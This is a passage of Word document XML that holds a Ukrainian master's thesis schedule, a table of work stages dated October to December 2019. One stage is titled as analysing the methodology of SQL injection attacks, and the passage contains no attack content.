          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF1B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>КАЛЕНДАРНИЙ ПЛАН</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7819DE60" w14:textId="79EA5193" w:rsidR="00BF1B1F" w:rsidRDefault="00BF1B1F" w:rsidP="00BF1B1F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>виконання магістерської роботи</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4870EF" w14:textId="4F215677" w:rsidR="00BF1B1F" w:rsidRDefault="00BF1B1F" w:rsidP="00BF1B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="932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7"/>
        <w:gridCol w:w="5451"/>
        <w:gridCol w:w="1725"/>
        <w:gridCol w:w="1529"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BF1B1F" w:rsidRPr="0061042F" w14:paraId="2586FA33" w14:textId="77777777" w:rsidTr="00C10923">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="617" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6E631479" w14:textId="77777777" w:rsidR="00BF1B1F" w:rsidRPr="0061042F" w:rsidRDefault="00BF1B1F" w:rsidP="008945BB">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0061042F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>№ п/п</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5451" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6A154590" w14:textId="77777777" w:rsidR="00BF1B1F" w:rsidRPr="0061042F" w:rsidRDefault="00BF1B1F" w:rsidP="008945BB">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0061042F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>Етапи виконання магістерської роботи</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1725" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D1A9CD3" w14:textId="77777777" w:rsidR="00BF1B1F" w:rsidRPr="0061042F" w:rsidRDefault="00BF1B1F" w:rsidP="008945BB">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0061042F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>Термін в</w:t>
            </w:r>
            <w:r w:rsidRPr="0061042F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>и</w:t>
            </w:r>
            <w:r w:rsidRPr="0061042F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>конання етапів</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1529" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="10FF19A1" w14:textId="77777777" w:rsidR="00BF1B1F" w:rsidRPr="0061042F" w:rsidRDefault="00BF1B1F" w:rsidP="008945BB">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0061042F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>Примітка</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF1B1F" w:rsidRPr="0061042F" w14:paraId="49192227" w14:textId="77777777" w:rsidTr="00C10923">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="617" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46393FA8" w14:textId="77777777" w:rsidR="00BF1B1F" w:rsidRPr="0061042F" w:rsidRDefault="00BF1B1F" w:rsidP="00BF1B1F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="0"/>
                <w:tab w:val="left" w:pos="240"/>
              </w:tabs>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5451" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D4BF4AA" w14:textId="77777777" w:rsidR="00BF1B1F" w:rsidRPr="00466851" w:rsidRDefault="00BF1B1F" w:rsidP="008945BB">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="465"/>
              </w:tabs>
              <w:ind w:left="20"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00466851">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>Уточнення постановки задачі</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1725" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05F5CF11" w14:textId="2C019DA5" w:rsidR="00BF1B1F" w:rsidRPr="0061042F" w:rsidRDefault="00466851" w:rsidP="00466851">
            <w:pPr>
              <w:spacing w:before="100" w:beforeAutospacing="1"/>
              <w:ind w:left="9" w:right="85"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00556827">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>14.10.19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1529" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42156038" w14:textId="77777777" w:rsidR="00BF1B1F" w:rsidRPr="0061042F" w:rsidRDefault="00BF1B1F" w:rsidP="008945BB">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0061042F">
              <w:rPr>
                <w:i/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>Виконано</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00466851" w:rsidRPr="0061042F" w14:paraId="6BE5448E" w14:textId="77777777" w:rsidTr="00C10923">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="617" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64401BE4" w14:textId="77777777" w:rsidR="00466851" w:rsidRPr="0061042F" w:rsidRDefault="00466851" w:rsidP="00466851">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="0"/>
                <w:tab w:val="left" w:pos="142"/>
                <w:tab w:val="left" w:pos="240"/>
              </w:tabs>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5451" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A7ADEFC" w14:textId="77777777" w:rsidR="00466851" w:rsidRPr="00466851" w:rsidRDefault="00466851" w:rsidP="00466851">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00466851">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>Аналіз літературних джерел</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1725" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26C92544" w14:textId="3F6713F3" w:rsidR="00466851" w:rsidRPr="0061042F" w:rsidRDefault="00A92302" w:rsidP="00A92302">
            <w:pPr>
              <w:spacing w:before="100" w:beforeAutospacing="1"/>
              <w:ind w:left="9" w:right="85"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00953B0F">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>15.10.19-01.11.19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1529" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0DA772A1" w14:textId="1689608A" w:rsidR="00466851" w:rsidRPr="0061042F" w:rsidRDefault="00466851" w:rsidP="00466851">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BF58E4">
              <w:rPr>
                <w:i/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>Виконано</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00466851" w:rsidRPr="0061042F" w14:paraId="58B956D8" w14:textId="77777777" w:rsidTr="00C10923">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="617" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5583F305" w14:textId="77777777" w:rsidR="00466851" w:rsidRPr="0061042F" w:rsidRDefault="00466851" w:rsidP="00466851">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="0"/>
                <w:tab w:val="left" w:pos="142"/>
                <w:tab w:val="left" w:pos="240"/>
              </w:tabs>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5451" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="420EF556" w14:textId="77777777" w:rsidR="00466851" w:rsidRPr="00466851" w:rsidRDefault="00466851" w:rsidP="00466851">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00466851">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>Обґрунтування вибору рішення</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1725" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52E6BB02" w14:textId="6AA03AE7" w:rsidR="00466851" w:rsidRPr="0061042F" w:rsidRDefault="00A92302" w:rsidP="00A92302">
            <w:pPr>
              <w:spacing w:before="100" w:beforeAutospacing="1"/>
              <w:ind w:left="9" w:right="85"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00953B0F">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>02.11.19-07.11.19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1529" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78A1229A" w14:textId="2F494EF2" w:rsidR="00466851" w:rsidRPr="0061042F" w:rsidRDefault="00466851" w:rsidP="00466851">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BF58E4">
              <w:rPr>
                <w:i/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>Виконано</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00466851" w:rsidRPr="0061042F" w14:paraId="3D838E48" w14:textId="77777777" w:rsidTr="00C10923">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="617" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="594581B2" w14:textId="77777777" w:rsidR="00466851" w:rsidRPr="0061042F" w:rsidRDefault="00466851" w:rsidP="00466851">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="0"/>
                <w:tab w:val="left" w:pos="142"/>
                <w:tab w:val="left" w:pos="240"/>
              </w:tabs>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5451" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A8D72B6" w14:textId="77777777" w:rsidR="00466851" w:rsidRPr="00466851" w:rsidRDefault="00466851" w:rsidP="00466851">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00466851">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>Збір інформації</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1725" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F76A347" w14:textId="3372838F" w:rsidR="00466851" w:rsidRPr="0061042F" w:rsidRDefault="00A92302" w:rsidP="00A92302">
            <w:pPr>
              <w:spacing w:before="100" w:beforeAutospacing="1"/>
              <w:ind w:left="9" w:right="85"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00953B0F">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>08.11.19-21.11.19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1529" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0562E1F8" w14:textId="2A667853" w:rsidR="00466851" w:rsidRPr="0061042F" w:rsidRDefault="00466851" w:rsidP="00466851">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BF58E4">
              <w:rPr>
                <w:i/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>Виконано</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00466851" w:rsidRPr="0061042F" w14:paraId="23B4D368" w14:textId="77777777" w:rsidTr="00C10923">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="617" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7AF639EB" w14:textId="77777777" w:rsidR="00466851" w:rsidRPr="0061042F" w:rsidRDefault="00466851" w:rsidP="00466851">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="0"/>
                <w:tab w:val="left" w:pos="142"/>
                <w:tab w:val="left" w:pos="240"/>
              </w:tabs>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5451" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5318DD70" w14:textId="18F06AAA" w:rsidR="00466851" w:rsidRPr="00466851" w:rsidRDefault="00466851" w:rsidP="00466851">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00466851">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>Аналіз даних та їх класифікація</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1725" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BF3EF45" w14:textId="5D4205F1" w:rsidR="00466851" w:rsidRPr="0061042F" w:rsidRDefault="00A92302" w:rsidP="00A92302">
            <w:pPr>
              <w:spacing w:before="100" w:beforeAutospacing="1"/>
              <w:ind w:left="9" w:right="85"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00953B0F">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>22.11.19-10.12.19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1529" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="582F253F" w14:textId="3822DCE6" w:rsidR="00466851" w:rsidRPr="0061042F" w:rsidRDefault="00466851" w:rsidP="00466851">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BF58E4">
              <w:rPr>
                <w:i/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>Виконано</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00466851" w:rsidRPr="0061042F" w14:paraId="44775887" w14:textId="77777777" w:rsidTr="00C10923">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="617" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B1EF75F" w14:textId="77777777" w:rsidR="00466851" w:rsidRPr="0061042F" w:rsidRDefault="00466851" w:rsidP="00466851">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="0"/>
                <w:tab w:val="left" w:pos="142"/>
                <w:tab w:val="left" w:pos="240"/>
              </w:tabs>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5451" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E04F95D" w14:textId="16BA6355" w:rsidR="00466851" w:rsidRPr="00466851" w:rsidRDefault="00466851" w:rsidP="00466851">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00466851">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>Проаналізувати методологію проведення SQL-ін’єкцій</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1725" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FDF3662" w14:textId="2CD30157" w:rsidR="00466851" w:rsidRPr="00A92302" w:rsidRDefault="00A92302" w:rsidP="00A92302">
            <w:pPr>
              <w:spacing w:before="100" w:beforeAutospacing="1"/>
              <w:ind w:left="9" w:right="85"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>11.12.19-18.12.19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1529" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71362005" w14:textId="2C8127BE" w:rsidR="00466851" w:rsidRPr="0061042F" w:rsidRDefault="00466851" w:rsidP="00466851">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BF58E4">
              <w:rPr>
                <w:i/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>Виконано</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00466851" w:rsidRPr="0061042F" w14:paraId="31783A5C" w14:textId="77777777" w:rsidTr="00C10923">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="617" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="318BFE7F" w14:textId="77777777" w:rsidR="00466851" w:rsidRPr="0061042F" w:rsidRDefault="00466851" w:rsidP="00466851">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="0"/>
                <w:tab w:val="left" w:pos="142"/>
                <w:tab w:val="left" w:pos="240"/>
              </w:tabs>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5451" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62AF249A" w14:textId="4C346AC9" w:rsidR="00466851" w:rsidRPr="00466851" w:rsidRDefault="00466851" w:rsidP="00466851">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00466851">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t xml:space="preserve">Розробити структурно – логічну модель веб-додатку </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1725" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="741C194F" w14:textId="0C759309" w:rsidR="00466851" w:rsidRPr="00A92302" w:rsidRDefault="00A92302" w:rsidP="00A92302">
            <w:pPr>
              <w:spacing w:before="100" w:beforeAutospacing="1"/>
              <w:ind w:left="9" w:right="85"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>19.12.19-31.12.19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1529" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7503E515" w14:textId="71DE62BC" w:rsidR="00466851" w:rsidRPr="0061042F" w:rsidRDefault="00466851" w:rsidP="00466851">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BF58E4">
              <w:rPr>
                <w:i/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>Виконано</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00466851" w:rsidRPr="0061042F" w14:paraId="0EB11EE7" w14:textId="77777777" w:rsidTr="00C10923">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="617" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C63AC44" w14:textId="77777777" w:rsidR="00466851" w:rsidRPr="0061042F" w:rsidRDefault="00466851" w:rsidP="00466851">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="0"/>
                <w:tab w:val="left" w:pos="142"/>
                <w:tab w:val="left" w:pos="240"/>
              </w:tabs>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5451" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AF8E5A3" w14:textId="77777777" w:rsidR="00466851" w:rsidRPr="00466851" w:rsidRDefault="00466851" w:rsidP="00466851">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00466851">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t xml:space="preserve">Створити програмну реалізацію </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46D4AC88" w14:textId="1E3DFBFD" w:rsidR="00466851" w:rsidRPr="00466851" w:rsidRDefault="00466851" w:rsidP="00466851">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
